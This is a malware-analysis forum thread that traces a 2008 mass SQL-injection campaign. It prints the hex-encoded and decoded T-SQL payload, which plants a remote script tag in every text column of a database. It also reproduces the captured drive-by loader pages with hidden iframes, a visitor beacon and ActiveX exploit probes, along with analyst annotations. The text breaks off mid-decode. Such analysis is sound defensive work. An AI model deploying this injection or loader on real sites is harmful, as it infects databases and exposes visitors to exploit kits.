Author Topic: SQL Injected jscript sites  (Read 71510 times)


August 24, 2008, 10:12:03 pm
Reply #105

JohnC


September 20, 2008, 11:24:05 am
Reply #106

Orac

Having problems posting this one, will have to split it up

Sample Log entry
Code: [Select]
***.***.***.*** - - [19/Sep/2008:14:24:10 +0000] "GET /forums/index.php?showtopic=4260';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" (malwarebytes.org) "-"

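Decoded (note: the URL decoder used here turned every '+' into a space, so the timestamp's "+0000" and the '+' string-concatenation operators inside the exec('update ...') statement are missing in the listing below; the decodes in Replies #109 and #110 keep them)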
Code: [Select]
***.***.***.*** - - [19/Sep/2008:14:24:10  0000] "GET /forums/index.php?showtopic=4260';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=''"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--'' [' @C '] where ' @C ' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" (malwarebytes.org) "-"


Code: [Select]
--11:48:09--  http://www3.ss11qn.cn/csrss/w.js
           => `w.js'
Resolving www3.ss11qn.cn... 121.11.76.85
Connecting to www3.ss11qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
// [analyst note] Captured copy of w.js, the file that the injected
// <script src="http://www3.ss11qn.cn/csrss/w.js"> tag pulls into any page
// rendered from a tampered database column. Comments marked [analyst note]
// were added for review; every other line is the sample as posted.
// Indicators visible in this file: www3.ss11qn.cn/csrss/new.htm,
// count41.51yes.com/sa.aspx?id=419214144, cookies cck_lasttime and cck_count.

// [analyst note] Error handler: on any script error it writes a zero-size
// iframe pointing at new.htm and returns true, which suppresses the browser's
// script-error notification.
window.onerror=function()
{

document.write("<iframe  width=0 height=0 src=http://www3.ss11qn.cn/csrss/new.htm></iframe>");

return true;
}

// [analyst note] Run-once guard: the body executes only while js2eus is still
// undefined. Presumably this is because the injection can place the same
// script tag in several columns of one page; verify against an infected page.
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

// [analyst note] Visitor beacon: referrer, page URL, colour depth, screen
// resolution, the cc_k() visit counter, system language and user agent are
// appended to a counter URL and sent through a zero-size iframe.
var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

// [analyst note] Next stage: the same new.htm iframe the error handler writes.
document.write("<iframe  width=0 height=0 src=http://www3.ss11qn.cn/csrss/new.htm></iframe>");

}

// [analyst note] y_gVal(iz): returns the slice of document.cookie from offset
// iz up to the next ";" (or to the end of the string when there is none).
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
// [analyst note] y_g(name): scans document.cookie for "name=" and returns its
// value through y_gVal(); returns null when the cookie is not present.
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
// [analyst note] cc_k(): returning-visitor counter kept in two cookies.
// First visit (no cck_lasttime): sets cck_lasttime to the current time and
// cck_count to 0, returns 0. Later visits: increments cck_count and refreshes
// cck_lasttime only when more than yesvisitor (1000*36000 ms, i.e. 10 hours)
// has passed, then returns the count. Cookie expiry is now + y_t
// (93312000 ms, roughly 26 hours, because setTime() takes milliseconds).
// y_c3 is assigned without var, so it becomes a global.
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}




Code: [Select]
--11:49:47--  http://www3.ss11qn.cn/csrss/new.htm
           => `new.htm'
Resolving www3.ss11qn.cn... 121.11.76.85
Connecting to www3.ss11qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<!-- [analyst note] Captured copy of new.htm, the page that w.js loads in a zero-size iframe.
     Comments marked [analyst note] were added for review; all other lines are the sample as posted. -->
<!-- [analyst note] NOTE(review): the Sym* functions in the first and last script blocks look like the
     pop-up blocking shim that Symantec/Norton client software inserts into fetched pages. They are
     probably an artefact of the capturing machine rather than content served by www3.ss11qn.cn;
     confirm against a capture taken without that software. -->
<script language="JavaScript">
<!--

// [analyst note] Returns true for every script error, which hides the error from the user.
function SymError()
{
  return true;
}

window.onerror = SymError;

// [analyst note] Keeps the real window.open so the last script block can restore it on load.
var SymRealWinOpen = window.open;

// [analyst note] Stub that replaces window.open while the page loads: opens nothing, returns an empty object.
function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<!-- [analyst note] Third-party visit counter (cnzz.com, id 1055584). -->
<script src="http://s123.cnzz.com/stat.php?id=1055584&web_id=1055584" language="JavaScript" charset="gb2312"></script>
<!-- [analyst note] Six zero-height iframes that load sibling pages from the same directory, unconditionally.
     Their contents are not shown in the post. The numeric names 06014 and 08053 follow the pattern of
     Microsoft security bulletin numbers (MS06-014, MS08-053); that link is a guess from the file names only. -->
<iframe src=06014.htm width=100 height=0></iframe>
<iframe src=flash.htm width=100 height=0></iframe>
<Iframe src=ff.htm width=100 height=0></iframe>
<Iframe src=ani.htm width=100 height=0></iframe>
<Iframe src=08053.htm width=100 height=0></iframe>
<Iframe src=tr.htm width=100 height=0></iframe>
<script>
// [analyst note] "kaspersky" is assigned but never read in the code shown here.
var kaspersky="ffuck"
// [analyst note] Builds a timestamp three hours ahead, used as the expiry of the gate cookie below.
// Property names are written as window["..."] string lookups instead of plain identifiers.
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
// [analyst note] Gate: the ActiveX probes run only when no "Cookie1=" cookie exists, so a given
// browser goes through them at most once per three hours. Cookie1=POPWINDOS is a usable host indicator.
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
// [analyst note] Each line below tries to instantiate one ActiveX control by ProgID and, when that
// succeeds, writes a hidden iframe for the page matched to that control. Failures are swallowed by
// the empty catch blocks. The ProgIDs show which installed software the page looks for, so they
// are the list to check endpoints against (presence and patch level of those controls).
// The \x.. escapes on the first line spell the ProgID "GLIEDown.IEDown.1".
// IERPCtl.IERPCtl.1 is probed twice and, in this variant, both real11.htm and real10.htm are
// written when it is present (no version check).
// NOTE(review): the net.htm and xl.htm lines carry a stray closing quote (src=net.htm"), so an
// HTML parser would take the quote as part of the URL and those two frames likely fail to load; confirm.
try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){}   
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real10.htm"></iframe>');}catch(e){}   
try{if(new window["ActiveXObject"]("NCTAudioFile2.AudioFile2.2"))window["document"]["write"]('<iframe style=display:none src=net.htm"></iframe>');}catch(e){} 
try{if(new window["ActiveXObject"]("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src=xl.htm"></iframe>');}catch(e){} 
try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');}
catch(e){}
// [analyst note] Assignment to an undeclared global; nothing in the code shown reads it.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<!-- [analyst note] Second third-party counter (51.la, id 2143797); its response is listed further down the post. -->
<script src="http://js.users.51.la/2143797.js"></script>
<script language="JavaScript">
<!--
// [analyst note] Closing half of the Sym* shim (see the NOTE(review) at the top of this listing):
// chains the page's own onload/onunload handlers, restores the real window.open once the page
// has loaded and re-installs the stub on unload.
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>



Code: [Select]
--11:53:40--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>



Code: [Select]
--11:58:56--  http://s123.cnzz.com/stat.php
           => `stat.php'
Resolving s123.cnzz.com... 219.232.243.4
Connecting to s123.cnzz.com[219.232.243.4]:80... connected
HTTP request sent, awaiting response... 200 OK

This loads a zero byte page.


Code: [Select]
--12:00:13--  http://js.users.51.la/2143797.js
           => `2143797.js'
Resolving js.users.51.la... 122.224.146.77
Connecting to js.users.51.la[122.224.146.77]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2143797" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');


Code: [Select]
--12:03:42--  http://www.51.la/?2143797
           => `?2143797'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<style type="text/css">
body {font-size:12px;line-height:120%;font-family:宋体;word-break: break-all;}
a {color: #000;text-decoration: none}
a:hover {color: #1653C2}
.a1 {color: #1653C2}
.a1:hover {color: #000}
img {border:none}
div {text-align:left}
#index_menu {margin:auto;width:760px;border-bottom:2px solid #1653C2;padding:0px;height:21px;text-align:center}
#index_menu ul {margin:0px;padding:4px 4px 0px 4px}
#index_menu li {display:inline;}
#index_menu a {color:#1653C2;padding:4px 15px 4px 15px}
#index_menu a:hover {color:#000;background-color:#EFEFEF}
#index_menu a.dq {color:#FFF;background-color:#1653C2}
#allbody {width:760px;margin: 0 auto}
#bottom {float: left;width:760px;text-align: center;margin-top:15px;border-top:1px solid #ACC1E8;padding:10px 0px;background-color:#E0E9FC;}
</style>
<title>us统计报告 - “我要啦”提供</title>
</head>
<body>
<div style="margin:20px 0px 20px 0px;text-align:center"><img alt="我要啦免费统计" src="http://51img.ajiang.net/main_logo.gif" /><br /><a href="http://bbs.51.la/forum-1-1.html">我要啦免费统计</a></div>
<div id="index_menu">
 <ul>
  <li><a href="http://bbs.51.la/forum-1-1.html">站长交流大厅</a></li>
  <li><a href="./" class="dq">首页</a></li>
  <li><a href="reg.asp">申请</a></li>
  <li><a href="login.asp">登录</a></li>
  <li><a href="http://top.51.la/">排行</a></li>
  <li><a href="news.asp">日志</a></li>
  <li><a href="http://help.51.la/">帮助</a></li>
 </ul>
</div>
<div id="allbody">
<div style="line-height:200%;margin:35px;text-align:center">
<a class="a1" href="http://help.51.la/faq/#17">什么是独立查看密码?</a>&nbsp;
<a class="a1" href="login.asp">【us】的站长请点击这里登录</a><br />
<form action="report/0_help.asp" style="margin:5px 0px 18px 0px">
<center>
<input type="hidden" name="id" value="2143797" />
<input type="hidden" name="t" value="chalogin" />
独立查看密码 <input name="LookPass" type="password" size="20" /> <input type="submit" value="查看〖 us 〗的统计报告" />
</center>
</form>

<span style="color:red">请注意: 您可能来自我要啦免费统计用户的网站,我要啦仅提供免费统计服务,与该网站经营活动无关。</span><br />

<a style="font-size:16px" href="reg.asp">申请您自己的免费统计账号</a>
<br /><a href="about.asp" title="为什么选择我要啦免费统计">了解网站现状·把握网站脉搏·超越发展极限——我要啦统计,站长智明的眼睛<!--功能更全面·数据更精确·操作更简便·服务更专业——我要啦统计,当然之选--></a>
<br /><a class="a1" href="report/1_main.asp?id=1" target="_blank" style="font-size:14px"> - 全 功 能 演 示 - </a>
</div>
<div style="width:760px;text-align: center;">
  <a href="http://union.wowowang.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_wowowang.gif" /></a>
  <a href="http://www.nicewords.org/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_nicewords.gif" /></a>
  <a href="http://www.kaikai8.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_kaikai8.gif" /></a>
  <a href="http://www.fenghuangchuanqi.com/?51la" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_fenghuangchuanqi.gif" /></a>
  <a href="http://www.zitian.cn/" target="_blank"><img alt="紫田网络平价域名" src="http://51img.ajiang.net/index_ztdm.gif" /></a>
  <a href="http://www.jjoobb.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_jjoobb.gif" /></a>
</div>
<div style="margin:15px 0px;text-align:center;width:760px;line-height:20px">善者吾善之,不善者吾亦善之,得善。信者吾信之,不信者吾亦信之,得信。<br />
<span id="ajiang_51la"></span>上善若水。水利万物而不争,处众人之所恶,顾几于道。

</div>
<div style="float: left;width:760px;text-align:center;margin-top:12px">
<a class="a1" href="/rule.asp">用户守则</a>
| <a class="a1" href="/usergetpass.asp">找回密码</a>
| <a class="a1" href="/friend.asp">广告联系</a>
| <a class="a1" href="/users.asp">典型用户</a>
| <a class="a1" href="/contact.asp">联系我们</a>
| <a class="a1" href="/about.asp">关于我们</a>
</div>
<div id="bottom">
服务器及带宽由 <a href="http://www.zitian.cn/" target="_blank">紫田网络(Zitian.CN)</a> 提供<br />
我要啦免费统计 Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> 豫ICP备05009218号<br />

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script type="text/javascript" src="http://js.users.51.la/5.js"></script>
<noscript><a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript>
</div>
</div>

</body>
</html>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>




Code: [Select]
--12:06:53--  http://js.users.51.la/5.js
           => `5.js'
Resolving js.users.51.la... 122.224.146.77
Connecting to js.users.51.la[122.224.146.77]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1; VIP &#x7528;&#x6237;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a5tf="51la";var a5pu="";var a5pf="51la";var a5su=window.location;var a5sf=document.referrer;var a5of="";var a5op="";var a5ops=1;var a5ot=1;var a5d=new Date();var a5color="";if (navigator.appName=="Netscape"){a5color=screen.pixelDepth;} else {a5color=screen.colorDepth;}<\/script><script>a5tf=top.document.referrer;<\/script><script>a5pu =window.parent.location;<\/script><script>a5pf=window.parent.document.referrer;<\/script><script>a5ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a5ops=(a5ops==null)?1: (parseInt(unescape((a5ops)[2]))+1);var a5oe =new Date();a5oe.setTime(a5oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a5ops+ ";path=/;expires="+a5oe.toGMTString();a5ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a5ot==null){a5ot=1;}else{a5ot=parseInt(unescape((a5ot)[2])); a5ot=(a5ops==1)?(a5ot+1):(a5ot);}a5oe.setTime(a5oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a5ot+";path=/;expires="+a5oe.toGMTString();<\/script><script>a5of=a5sf;if(a5pf!=="51la"){a5of=a5pf;}if(a5tf!=="51la"){a5of=a5tf;}a5op=a5pu;try{lainframe}catch(e){a5op=a5su;}document.write(\'<img style="width:0px;height:0px" src="http://vip.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=19&id=5&tpages=\'+a5ops+\'&ttimes=\'+a5ot+\'&tzone=\'+(0-a5d.getTimezoneOffset()/60)+\'&tcolor=\'+a5color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a5of)+\'&vpage=\'+escape(a5op)+\'" \/>\');<\/script>');


Code: [Select]
--12:03:42--  http://www.51.la/?5
           => `?5'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<style type="text/css">
body {font-size:12px;line-height:120%;font-family:宋体;word-break: break-all;}
a {color: #000;text-decoration: none}
a:hover {color: #1653C2}
.a1 {color: #1653C2}
.a1:hover {color: #000}
img {border:none}
div {text-align:left}
#index_menu {margin:auto;width:760px;border-bottom:2px solid #1653C2;padding:0px;height:21px;text-align:center}
#index_menu ul {margin:0px;padding:4px 4px 0px 4px}
#index_menu li {display:inline;}
#index_menu a {color:#1653C2;padding:4px 15px 4px 15px}
#index_menu a:hover {color:#000;background-color:#EFEFEF}
#index_menu a.dq {color:#FFF;background-color:#1653C2}
#allbody {width:760px;margin: 0 auto}
#bottom {float: left;width:760px;text-align: center;margin-top:15px;border-top:1px solid #ACC1E8;padding:10px 0px;background-color:#E0E9FC;}
</style>
<title>我要啦免费统计统计报告 - “我要啦”提供</title>
</head>
<body>
<div style="margin:20px 0px 20px 0px;text-align:center"><img alt="我要啦免费统计" src="http://51img.ajiang.net/main_logo.gif" /><br /><a href="http://bbs.51.la/forum-1-1.html">我要啦免费统计</a></div>
<div id="index_menu">
 <ul>
  <li><a href="http://bbs.51.la/forum-1-1.html">站长交流大厅</a></li>
  <li><a href="./" class="dq">首页</a></li>
  <li><a href="reg.asp">申请</a></li>
  <li><a href="login.asp">登录</a></li>
  <li><a href="http://top.51.la/">排行</a></li>
  <li><a href="news.asp">日志</a></li>
  <li><a href="http://help.51.la/">帮助</a></li>
 </ul>
</div>
<div id="allbody">
<div style="line-height:200%;margin:35px;text-align:center">
<a class="a1" style="font-size:14px" href="report/1_main.asp?id=5">&gt;&gt; 查看〖 我要啦免费统计 〗的统计报告 &gt;&gt;</a><br />

<a style="font-size:16px" href="reg.asp">申请您自己的免费统计账号</a>
<br /><a href="about.asp" title="为什么选择我要啦免费统计">了解网站现状·把握网站脉搏·超越发展极限——我要啦统计,站长智明的眼睛<!--功能更全面·数据更精确·操作更简便·服务更专业——我要啦统计,当然之选--></a>
<br /><a class="a1" href="report/1_main.asp?id=1" target="_blank" style="font-size:14px"> - 全 功 能 演 示 - </a>
</div>
<div style="width:760px;text-align: center;">
  <a href="http://union.wowowang.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_wowowang.gif" /></a>
  <a href="http://www.nicewords.org/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_nicewords.gif" /></a>
  <a href="http://www.kaikai8.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_kaikai8.gif" /></a>
  <a href="http://www.fenghuangchuanqi.com/?51la" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_fenghuangchuanqi.gif" /></a>
  <a href="http://www.zitian.cn/" target="_blank"><img alt="紫田网络平价域名" src="http://51img.ajiang.net/index_ztdm.gif" /></a>
  <a href="http://www.jjoobb.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_jjoobb.gif" /></a>
</div>
<div style="margin:15px 0px;text-align:center;width:760px;line-height:20px">善者吾善之,不善者吾亦善之,得善。信者吾信之,不信者吾亦信之,得信。<br />
<span id="ajiang_51la"></span>上善若水。水利万物而不争,处众人之所恶,顾几于道。

</div>
<div style="float: left;width:760px;text-align:center;margin-top:12px">
<a class="a1" href="/rule.asp">用户守则</a>
| <a class="a1" href="/usergetpass.asp">找回密码</a>
| <a class="a1" href="/friend.asp">广告联系</a>
| <a class="a1" href="/users.asp">典型用户</a>
| <a class="a1" href="/contact.asp">联系我们</a>
| <a class="a1" href="/about.asp">关于我们</a>
</div>
<div id="bottom">
服务器及带宽由 <a href="http://www.zitian.cn/" target="_blank">紫田网络(Zitian.CN)</a> 提供<br />
我要啦免费统计 Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> 豫ICP备05009218号<br />

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script type="text/javascript" src="http://js.users.51.la/5.js"></script>
<noscript><a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript>
</div>
</div>

</body>
</html>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>

Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment

September 20, 2008, 11:24:51 am
Reply #107

Orac


Code: [Select]
--12:13:46--  http://bbs.51.la/forum-1-1.html
           => `forum-1-1.html'
Resolving bbs.51.la... 203.171.229.47
Connecting to bbs.51.la[203.171.229.47]:80... connected
HTTP request sent, awaiting response... 200 OK

This still won't post due to its size, so I've added it as an attachment.
Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment

September 26, 2008, 06:39:03 pm
Reply #108

JohnC


October 11, 2008, 11:00:04 am
Reply #109

Orac

Log entry
Code: [Select]
xxx.xxx.xxx.xxx - - [10/Oct/2008:16:49:11 +0000] "GET /forum/viewtopic.php?f=11&t=28980';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" (malwareremoval.com) "-"

Decoded; note the new file location: the injected script tag now points at /csrss/new.htm instead of /csrss/w.js.
Code: [Select]
-- [analyst note] Decoded form of the hex string that the logged request passes through
-- CAST(0x... AS CHAR(4000)) and EXEC(@S). Lines starting with "--" were added for review;
